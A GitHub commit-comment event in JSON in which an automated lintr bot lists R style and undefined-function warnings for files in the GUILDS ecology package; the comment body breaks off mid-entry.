{"id":"4601667078","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19128044,"position":null,"line":null,"path":null,"commit_id":"c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd","created_at":"2016-09-22T10:41:11Z","updated_at":"2016-09-22T10:41:11Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S, N, I, theta, KDA) {\n^~~~~~~~~~~\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) - \n                ^\n```\n[R/Condition.R:23:49:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) - \n                                                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:61:18:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:61:54:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:74:19:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L74) *style:* **Variable and function names should be all lowercase.**\n```r\n​ check_left_x  <- evaluateCondLik(eps, theta_x, theta_y,\n                  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:76:19:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L76) *style:* **Variable and function names should be all lowercase.**\n```r\n​ check_right_x <- evaluateCondLik(1 - eps, theta_x, theta_y,\n                  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:81:16:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:89:16:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:97:15:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x, theta_x, theta_y,\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:114:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L114) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:114:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L114) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:114:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L114) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:119:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L119) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:124:54:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\") \n                                                     ^\n```\n[R/Condition.R:129:50:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L129) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\",\"\\n\")\n                                                 ^\n```\n[R/Condition.R:138:9:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L138) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:138:9:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L138) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:141:23:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L141) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:141:23:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L141) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:147:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L147) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:154:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L154) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:158:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L158) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:167:9:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L167) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:171:14:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:171:14:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L171) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L176) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L176) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L176) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:46:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L176) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n                                             ^~~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L181) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L181) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:202:17:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:210:10:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L210) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(initVals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:210:18:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- simplex(initVals, g, verbose)\n                 ^~~~~~~~\n```\n[R/Condition.R:211:4:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L211) *style:* **Trailing whitespace is superfluous.**\n```r\n​  } \n   ^\n```\n[R/Condition.R:213:10:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L213) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​    x <- subplex(initVals, g)\n         ^~~~~~~\n```\n[R/Condition.R:213:18:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/Condition.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- subplex(initVals, g)\n                 ^~~~~~~~\n```\n[R/drawLocal.R:2:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n^\n```\n[R/drawLocal.R:2:2:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n ^\n```\n[R/drawLocal.R:2:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n          ~^~~\n```\n[R/drawLocal.R:2:32:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                               ^~\n```\n[R/drawLocal.R:2:49:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                ^~\n```\n[R/drawLocal.R:2:59:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L2) *style:* **Put spaces around all infix operators.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                         ~^~\n```\n[R/drawLocal.R:2:62:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L2) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n                                                             ^~~~\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres <- rep(0, length(k1))\n^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0=which(x==0);\n^\n```\n[R/drawLocal.R:3:13:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tres <- rep(0, length(k1))\n           ~^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L4) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (cnt in 1:length(k1)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n^~\n```\n[R/drawLocal.R:5:13:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (cnt in 1:length(k1)) {\n            ^\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk <- k1[cnt]\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux;\n^~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x, I, th, j, k))\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1=which(x==1);\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax <- optimize(f, c(0,1))$minimum\n                    ~^~~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx1)) {\n^\n```\n[R/drawLocal.R:11:11:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax <- pm_sadaux(xmax, I, th, j, k)\n                    ~^~~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n^~\n```\n[R/drawLocal.R:12:9:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 <- pm_sadaux(0, I, th, j, k)\n                  ~^~~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif(ymax < (y0 + 1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- 0\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] = 0;\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = Inf;\n^~~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k) - ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t   